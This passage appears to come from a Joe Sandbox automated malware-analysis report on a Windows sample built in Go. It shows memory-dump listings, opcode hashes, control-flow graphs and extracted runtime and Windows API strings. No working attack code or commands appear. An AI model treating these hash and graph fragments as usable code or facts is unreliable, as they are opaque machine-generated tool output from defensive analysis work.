                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e454e5f73a4012067eb0d6c02dfe7c49ca4f58a69bf0829b5723d20e03b91bc
                      • Instruction ID: 53f162c40c4165a36d5e98ecb3004abfd1cff082c6b6bd1e31e391a0a96c6da9
                      • Opcode Fuzzy Hash: 3e454e5f73a4012067eb0d6c02dfe7c49ca4f58a69bf0829b5723d20e03b91bc
                      • Instruction Fuzzy Hash: A5917977618B8486DB20DB15F08035AB7A2F78ABD4F58512AEBDE53B59CB3CC455CB00
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5c8d7580c853090fa780d2b6ed774be28704c3aa338da57b315b5a74c926a3a7
                      • Instruction ID: 9bb9567d958438eebd1da00d984919142f71b699eb28ba90f5ad0cddaacc8817
                      • Opcode Fuzzy Hash: 5c8d7580c853090fa780d2b6ed774be28704c3aa338da57b315b5a74c926a3a7
                      • Instruction Fuzzy Hash: 3A4118A6701A6586AE149B6685240AAE363E74EFD07D8F333CF1D77768CA3CD506C344
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 75958c0b36038fcb0a4e50354b0b014c9d6bf0bdce3b23ccdf1be2c19ce7c316
                      • Instruction ID: c052e3c231f17a6b2b0f7f83d94d5018748080e93a70c46af04736d99502d94d
                      • Opcode Fuzzy Hash: 75958c0b36038fcb0a4e50354b0b014c9d6bf0bdce3b23ccdf1be2c19ce7c316
                      • Instruction Fuzzy Hash: 68511632608F8486DB45CB66E0413AA77A7F786BD0F149226EA9D13F8ADF3CC095C741
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c77385fd8b9cf3e123f68f932efaa551cc3d4adedf4e7a27580baed2aefa8f2
                      • Instruction ID: 056baab6c7791d8c4b79e6f0d20f72cb0fd7e647329dd4600fdb42ad98911ea4
                      • Opcode Fuzzy Hash: 7c77385fd8b9cf3e123f68f932efaa551cc3d4adedf4e7a27580baed2aefa8f2
                      • Instruction Fuzzy Hash: F75136A2F09F948ADE46D7399514399D31BAB56FD0F24C322AD0A3BF59E71AC4838700
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc274acb7e725ce59d9e497d95335f31032c8fbd7671e5929715436da5eabd8e
                      • Instruction ID: 0c7ab420c16a6d8fc16a896a15ae1248f74657bf8d43582774cc826ad83f34de
                      • Opcode Fuzzy Hash: dc274acb7e725ce59d9e497d95335f31032c8fbd7671e5929715436da5eabd8e
                      • Instruction Fuzzy Hash: 0821F7A1E19E444ACA43EB3A9440355D217BF967D0F58C732AE1E777A6E738E0D24740
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f4a0d4820a58a1625e181f1b08e57c8c87afa8b59031d49f9920a2ff030ede7
                      • Instruction ID: 457aaf471c97a4877fb228421fd9b505ea6b6f609b9a75ae7f884b8b542c7147
                      • Opcode Fuzzy Hash: 9f4a0d4820a58a1625e181f1b08e57c8c87afa8b59031d49f9920a2ff030ede7
                      • Instruction Fuzzy Hash: 50C08CA0D06AC298FB208310710035029829F063C0D81D081838C043189B2C82814204

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 358 696020-696029 359 69602f-69606d 358->359 360 696647-696679 call 6d9860 358->360 362 696309-696318 359->362 363 696073-696083 359->363 360->358 365 696089-696093 363->365 366 696635-696646 call 6b2d80 363->366 367 696099-6960a0 365->367 368 696605-696630 call 6d43a0 call 6c83a0 call 6b2d80 365->368 366->360 372 6965f3-696600 call 6b2d80 367->372 373 6960a6-6960bb call 691600 367->373 368->366 372->368 380 6960ed-6960fb 373->380 381 6960bd-6960cf 373->381 384 6960fd-696109 380->384 385 696127 380->385 382 6960dd-6960ec 381->382 383 6960d1-6960d8 381->383 387 696578-69657b 383->387 388 69655d-696569 call 6b2d80 384->388 389 69610f-696114 384->389 390 69612c-696137 385->390 395 69657d-696587 387->395 396 6965e2-6965ee call 6b2d80 387->396 399 69656e-696575 388->399 389->388 391 69611a-696120 389->391 393 6962ab-696308 call 6d9720 390->393 394 69613d-696148 390->394 391->390 398 696122 391->398 401 69652a-696558 call 6d43a0 call 6c83a0 call 6b2d80 394->401 402 69614e-696165 394->402 403 696589-696590 395->403 404 696592-696599 395->404 396->372 398->388 399->387 401->388 407 69616b-696173 402->407 408 6964bd-696525 call 6d43a0 * 2 call 6c8580 call 6b2d80 402->408 403->404 409 6965d2-6965e1 403->409 410 6965a9-6965b0 404->410 411 69659b-6965a7 404->411 414 696179-696184 407->414 415 696465-6964b8 call 6d43a0 * 2 call 6c8480 call 6b2d80 407->415 408->401 416 6965c0-6965c7 410->416 417 6965b2-6965b9 410->417 411->409 411->410 423 69618d 414->423 424 696186-69618b 414->424 415->408 416->399 420 6965c9-6965d0 416->420 417->409 418 6965bb 417->418 418->416 420->399 420->409 428 696192-696195 423->428 424->428 429 69619b-6961a7 428->429 430 69645c-696460 call 6dbf40 428->430 434 6961ad-6961ba 429->434 435 696253-69625a 429->435 430->415 439 6961bc-6961c4 434->439 440 696202-69620d call 6d4440 434->440 441 69625c-696261 435->441 442 696263 435->442 445 6963fa-696449 call 6d43a0 * 2 call 6c8480 call 6b2d80 439->445 446 6961ca-6961cf 439->446 461 69620f-696214 440->461 462 696216-696228 call 6d4440 440->462 447 696268-696283 441->447 442->447 469 69644e-696453 445->469 446->435 451 6961d5-6961eb call 689fa0 446->451 453 696289-6962a6 447->453 454 6963f3-6963f5 call 6dc000 447->454 471 6961f1-696200 451->471 472 696455-69645a 451->472 460 696336-696339 453->460 454->445 466 696319-696333 460->466 467 69633b-6963f2 call 695b60 call 6d9720 460->467 465 69622b-69622d 461->465 462->465 465->469 470 696233-696245 465->470 466->460 469->445 470->445 476 69624b-696250 470->476 471->435 472->445 476->435
                      Strings
                      • because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125AddFontResourceExWArab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCheckMenuRadioItemCloseServiceHandleCommandLineToArgvWCreateCompatibleDCCreateDi, xrefs: 006964DC
                      • runtime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot splice1776356839400250464677, xrefs: 0069643D, 006964AC, 00696517
                      • runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 0069654C
                      • to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboardCloseThemeDataCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomDefWindo, xrefs: 00696428, 00696497, 00696502
                      • , not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindowToTopCloseEnhMetaFileCoCreateInstanceCoGetClassObjectConnectNamedPipeCopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryp, xrefs: 0069653D
                      • nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunsafe.PointerwglCopyC, xrefs: 006965F3
                      • runtime.SetFinalizer: pointer not at beginning of allocated blockbytes.Buffer: UnreadByte: previous operation was not a successful readcannot convert slice with length %y to pointer to array with length %xtoo many concurrent operations on a single file or sock, xrefs: 0069655D
                      • runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prec34694469519536141888, xrefs: 00696624
                      • Nw, xrefs: 006960D1
                      • runtime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintpt, xrefs: 006965E2
                      • runtime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnun, xrefs: 00696635
                      • , not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxWCreateRectRgnDeleteServiceDestroyWindowDrawFocusRectEnumPrintersWEnumProcessesExitWindowsExFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetClientRect, xrefs: 00696615
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125AddFontResourceExWArab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCheckMenuRadioItemCloseServiceHandleCommandLineToArgvWCreateCompatibleDCCreateDi$ to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboardCloseThemeDataCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomDefWindo$, not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindowToTopCloseEnhMetaFileCoCreateInstanceCoGetClassObjectConnectNamedPipeCopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryp$, not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxWCreateRectRgnDeleteServiceDestroyWindowDrawFocusRectEnumPrintersWEnumProcessesExitWindowsExFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetClientRect$nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunsafe.PointerwglCopyC$runtime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot splice1776356839400250464677$runtime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnun$runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prec34694469519536141888$runtime.SetFinalizer: pointer not at beginning of allocated blockbytes.Buffer: UnreadByte: previous operation was not a successful readcannot convert slice with length %y to pointer to array with length %xtoo many concurrent operations on a single file or sock$runtime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintpt$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884$Nw
                      • API String ID: 0-2002210619
                      • Opcode ID: f510e99f47c2743e515f84799fdb0f3f5e8436660c9072ce87b1bb6428b95db0
                      • Instruction ID: da48e48da6f08c2a6e76a0217b815ad0a9ee90630ac8f9886db971bfa60d901d
                      • Opcode Fuzzy Hash: f510e99f47c2743e515f84799fdb0f3f5e8436660c9072ce87b1bb6428b95db0
                      • Instruction Fuzzy Hash: A0E19F32609B8082DB609F55F4403EEB7AAF785B80F49952AEB8D47B59DF3CD495CB00

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 483 686000-686004 484 68600a-686035 call 6cab20 483->484 485 68634f-686354 call 6d97c0 483->485 490 68606f-686084 call 6cb2a0 484->490 491 686037-68604b 484->491 485->483 498 68608a-68608e 490->498 499 686145-686149 490->499 492 686059-686060 call 6dbaa0 491->492 493 68604d-686057 491->493 495 686065-68606e 492->495 493->495 500 686090-6860a3 498->500 501 6860e5-6860e9 498->501 502 68614f-686153 499->502 503 6861d7-6861f5 call 682060 499->503 504 6860c3 500->504 505 6860a5-6860ab 500->505 507 686289-68628d 501->507 509 6860ef-686103 501->509 502->507 508 686159-686169 502->508 523 686238-68624d 503->523 524 6861f7-68620c 503->524 504->507 513 6860c9-6860cf 504->513 510 6860ad-6860b1 505->510 511 6860c0 505->511 516 6862d8-6862f4 call 6ca640 507->516 517 68628f-68629c 507->517 514 68616b-686172 508->514 515 68618e 508->515 518 686115 509->518 519 686105-68610c 509->519 521 686277-686280 510->521 522 6860b7-6860ba 510->522 511->504 513->507 525 6860d5-6860d9 513->525 526 68618b 514->526 527 686174-686180 514->527 528 6861ae 515->528 529 686190-686197 515->529 549 6862fc-686315 call 6cb940 516->549 550 6862f6-6862f9 516->550 517->516 530 68629e-6862b2 517->530 532 686129 518->532 533 686117-686120 518->533 519->521 531 686112 519->531 522->504 540 68624f-686256 523->540 541 686266 523->541 536 68620e-686215 524->536 537 686225 524->537 525->521 538 6860df-6860e0 525->538 526->515 527->521 543 686186-686189 527->543 528->507 534 6861b4-6861c0 528->534 544 686199-6861a0 529->544 545 6861ab 529->545 546 6862c2-6862c9 call 6dbaa0 530->546 547 6862b4-6862c0 530->547 531->518 532->507 542 68612f-686136 532->542 533->521 539 686126 533->539 534->507 548 6861c6-6861cc 534->548 551 686222 536->551 552 686217-68621b 536->552 553 686281-686284 537->553 554 686227-68622e 537->554 538->507 539->532 555 686258-68625c 540->555 556 686263 540->556 541->553 558 686268-68626f 541->558 542->521 557 68613c-686140 542->557 543->515 544->521 559 6861a6-6861a9 544->559 545->528 560 6862ce-6862d7 546->560 547->560 548->521 562 6861d2 548->562 570 686345-68634e 549->570 571 686317-68632b 549->571 550->549 551->537 552->521 564 68621d-686220 552->564 553->507 554->553 565 686230-686234 554->565 555->521 566 68625e-686261 555->566 556->541 557->507 558->553 567 686271-686275 558->567 559->528 562->507 564->537 565->521 569 686236 565->569 566->541 567->521 567->553 569->553 572 686339-686340 call 6dbaa0 571->572 573 68632d-686337 571->573 572->570 573->570
                      Strings
                      • debugCal, xrefs: 006861FF
                      • debugCal, xrefs: 00686240
                      • runtime., xrefs: 0068628F
                      • debugCal, xrefs: 006860F2
                      • debugCal, xrefs: 00686093
                      • call from unknown functioncorrupted semaphore ticketentersyscall inconsistent forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type, xrefs: 0068604D, 00686059
                      • debugCal, xrefs: 0068615C
                      • l819, xrefs: 00686268
                      • call from within the Go runtimecannot assign requested addresscasgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid netw, xrefs: 006862B4, 006862C2
                      • debugCall2048exchange fullfatal error: gethostbynamegetservbynamelevel 3 resetload64 failedmin too largenil stackbaseout of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method wglShareListsxadd64 failedxchg64 failed}sched={pc:, xrefs: 006861E1
                      • call not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreach, xrefs: 0068632D, 00686339
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
